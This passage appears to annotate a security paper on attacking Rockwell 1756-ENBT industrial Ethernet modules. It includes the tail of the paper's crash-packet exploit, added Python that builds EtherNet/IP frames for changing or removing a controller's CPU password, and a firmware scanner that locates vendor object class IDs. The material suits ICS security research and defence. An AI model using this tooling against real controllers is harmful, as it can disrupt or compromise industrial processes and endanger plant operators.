        forgePacket(packetCrashEth, sizeof(packetCrashEth) - 1, ENCAP_CMD_SEND_RRDATA, enbt_socket);
        return 0;
    }
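The encapsulation the paper describes (Register Session, then Send RR Data carrying a Connection Manager Unconnected Send around the real request) is the same for every attack in section 3.2 and for the CPU Security tool traffic in section 3.1. The following Python is an added example, not the paper's exploit.c: it builds those frames from the structures and dissections quoted above and parses the replies. It generalizes beyond the paper by handling arbitrary class/instance/attribute paths and route paths; the constants for the CPU Security object (class 0x8E, services 0x51 and 0x53, length-prefixed passwords) are taken from the captures shown, and the route path 01 00 (backplane port 1, slot 0) is assumed from the trailing bytes of those captures.

```python
"""Added example: build and parse EtherNet/IP (ENIP) encapsulation frames and
CIP Unconnected Send requests of the kind the paper replays.  Not the paper's
exploit.c; written from the ENCAP_H structure and the captures shown in the text."""
import struct

ENIP_PORT = 44818
CMD_REGISTER_SESSION = 0x65     # ENCAP_CMD_REGISTERSESSION (101)
CMD_SEND_RR_DATA = 0x6F         # ENCAP_CMD_SEND_RRDATA (111)
CPF_NULL_ADDRESS = 0x0000
CPF_UNCONNECTED_DATA = 0x00B2   # the 0xB2 item BootpServer.exe writes
CM_CLASS, CM_UNCONNECTED_SEND = 0x06, 0x52
# CPU Security object and services observed in the section 3.1 captures
CPU_SECURITY_CLASS, SVC_SET_PASSWORD, SVC_UNSECURE = 0x8E, 0x51, 0x53


def encap(command, session, data=b""):
    """24-byte little-endian ENCAP_H (command, length, session, status,
    8-byte sender context, options) followed by the command-specific data."""
    return struct.pack("<HHII8sI", command, len(data), session, 0, b"\0" * 8, 0) + data


def register_session():
    """Register Session: protocol version 1, option flags 0 (session handle 0)."""
    return encap(CMD_REGISTER_SESSION, 0, struct.pack("<HH", 1, 0))


def session_from_reply(frame):
    """Return the session handle the module assigned (offset 4, as exploit.c reads it)."""
    command, _, session, status = struct.unpack_from("<HHII", frame, 0)
    if command != CMD_REGISTER_SESSION or status != 0:
        raise ValueError("RegisterSession failed: cmd=%#x status=%#x" % (command, status))
    return session


def epath(cls, instance=None, attribute=None):
    """8-bit logical segments: 0x20 class, 0x24 instance, 0x30 attribute."""
    path = bytes([0x20, cls])
    if instance is not None:
        path += bytes([0x24, instance])
    if attribute is not None:
        path += bytes([0x30, attribute])
    return path


def cip_request(service, path, data=b""):
    """Message Router request: service, path size in 16-bit words, path, data."""
    return bytes([service, len(path) // 2]) + path + data


def unconnected_send(embedded, route=b"\x01\x00", priority=0x03, timeout_ticks=240):
    """Connection Manager (class 6, instance 1) service 0x52 wrapping an embedded
    request.  route 01 00 = backplane port 1, slot 0 (assumed to be the CPU)."""
    body = bytes([priority, timeout_ticks]) + struct.pack("<H", len(embedded)) + embedded
    if len(embedded) % 2:
        body += b"\x00"                       # pad byte after an odd-length embedded request
    body += bytes([len(route) // 2, 0]) + route
    return cip_request(CM_UNCONNECTED_SEND, epath(CM_CLASS, 0x01), body)


def send_rr_data(session, cip):
    """SendRRData: interface handle 0 (CIP), timeout 0, then two CPF items:
    a null address item and an unconnected data item (0xB2) carrying the CIP request."""
    cpf = struct.pack("<HHHHH", 2, CPF_NULL_ADDRESS, 0, CPF_UNCONNECTED_DATA, len(cip)) + cip
    return encap(CMD_SEND_RR_DATA, session, struct.pack("<IH", 0, 0) + cpf)


def parse_rr_reply(frame):
    """Return (reply service, CIP general status, reply data) from a SendRRData reply."""
    command, length, _, status = struct.unpack_from("<HHII", frame, 0)
    if command != CMD_SEND_RR_DATA or status != 0:
        raise ValueError("encapsulation error: cmd=%#x status=%#x" % (command, status))
    body = frame[24:24 + length]
    count, = struct.unpack_from("<H", body, 6)   # item count follows interface handle + timeout
    off = 8
    for _ in range(count):
        item_type, item_len = struct.unpack_from("<HH", body, off)
        off += 4
        if item_type == CPF_UNCONNECTED_DATA:
            cip = body[off:off + item_len]
            ext_words = cip[3]                    # size of the extended status, in words
            return cip[0], cip[2], cip[4 + 2 * ext_words:]
        off += item_len
    raise ValueError("no unconnected data item in reply")


def lenstr(s):
    """Password encoding seen in the captures: UINT16 length followed by the bytes."""
    return struct.pack("<H", len(s)) + s.encode()


def set_password_request(old, new):
    """Class 0x8E service 0x51: old password then new password, wrapped for the CPU."""
    data = lenstr(old) + lenstr(new)
    return unconnected_send(cip_request(SVC_SET_PASSWORD, epath(CPU_SECURITY_CLASS, 1), data))


def unsecure_request(password):
    """Class 0x8E service 0x53 with the current password."""
    return unconnected_send(cip_request(SVC_UNSECURE, epath(CPU_SECURITY_CLASS, 1), lenstr(password)))
```

Rebuilding the "ABC" to "ABCD" password change with `send_rr_data(session, set_password_request("ABC", "ABCD"))` yields a 72-byte frame, which with the 54 bytes of Ethernet, IP and TCP headers gives exactly the 126-byte frame Wireshark shows; the unsecure request gives the 120-byte frame the same way. That arithmetic is a cheap way to check a hand-built packet against a capture before sending it to a controller.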
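Section 3.3 locates the class ID of each vendor-specific object by spotting `li r9, 0xXX` followed by `sth r9, 0x14(r4)` in the object's Init routine. The scanner below is an added example (not the paper's IDA workflow) that finds that pattern in raw big-endian PowerPC code bytes without a disassembler; it decodes only the D-form instructions the pattern needs. The sample image is constructed from the NV_Init instructions quoted in the text plus a non-matching decoy, and is not dumped firmware; the four-instruction window between the load and the store is an assumption.

```python
"""Added example: scan PowerPC code for the class-ID pattern the paper uses to
enumerate vendor-specific CIP objects in the 1756-ENBT firmware:
    li  r9, 0xXX        (addi r9, r0, XX)
    sth r9, 0x14(r4)
Stand-alone, not the paper's IDA script.  Sample bytes are constructed from the
NV_Init listing in section 3.3, not taken from a firmware dump."""
import struct

OP_ADDI, OP_ADDIS, OP_STH = 14, 15, 44   # primary opcodes of addi/li, addis/lis, sth


def decode(word):
    """Decode the few D-form instructions the pattern needs.  Returns
    ("li", rD, imm), ("lis", rD, imm), ("sth", rS, rA, d) or ("other",)."""
    opcode = word >> 26
    r1 = (word >> 21) & 0x1F
    r2 = (word >> 16) & 0x1F
    imm = word & 0xFFFF
    simm = imm - 0x10000 if imm & 0x8000 else imm
    if opcode == OP_ADDI and r2 == 0:      # addi rD, r0, imm is the li mnemonic
        return ("li", r1, simm)
    if opcode == OP_ADDIS and r2 == 0:     # addis rD, r0, imm is the lis mnemonic
        return ("lis", r1, simm)
    if opcode == OP_STH:
        return ("sth", r1, r2, simm)
    return ("other",)


def find_class_ids(image, base, window=4):
    """Return [(address_of_li, class_id)] for every li r9 whose value is stored to
    0x14(r4) within `window` instructions: the class-ID field of the object
    descriptor that the Init routines hand to GS_PutMsgQueue."""
    hits = []
    pending = None                          # (address, value) of the most recent li r9
    for off in range(0, len(image) - 3, 4):
        word, = struct.unpack_from(">I", image, off)
        ins = decode(word)
        addr = base + off
        if ins[0] == "li" and ins[1] == 9:
            pending = (addr, ins[2] & 0xFFFF)
        elif ins[0] == "sth" and ins[1] == 9 and ins[2] == 4 and ins[3] == 0x14:
            if pending and addr - pending[0] <= window * 4:
                hits.append(pending)
            pending = None
    return hits


def ppc(words):
    """Assemble a list of 32-bit instruction words into big-endian code bytes."""
    return b"".join(struct.pack(">I", w) for w in words)


# Constructed sample: the NV_Init fragment from the paper, followed by a decoy
# li r9 whose value goes to a different descriptor field.
NV_INIT_BASE = 0x141A44
NV_INIT_SAMPLE = ppc([
    0x90040004,   # ROM:00141A44  stw  r0, 4(r4)
    0x392000A1,   # ROM:00141A48  li   r9, 0xA1        <- class ID of the NV object
    0xB1240014,   # ROM:00141A4C  sth  r9, 0x14(r4)
    0x39600001,   # ROM:00141A50  li   r11, 1
    0xB1640016,   # ROM:00141A54  sth  r11, 0x16(r4)
    0x3D200033,   # ROM:00141A58  lis  r9, 0x33
    0x39200005,   #               li   r9, 5           decoy: not stored to 0x14(r4)
    0xB1240018,   #               sth  r9, 0x18(r4)
])

if __name__ == "__main__":
    for addr, class_id in find_class_ids(NV_INIT_SAMPLE, NV_INIT_BASE):
        print("ROM:%08X  class ID 0x%02X" % (addr, class_id))
```

Run against a whole rebased image, the scanner gives candidate class IDs that still have to be confirmed by checking that the following call really is GS_PutMsgQueue (after the symbol table has been rebuilt as described above); the pattern alone can also match unrelated halfword stores through r4.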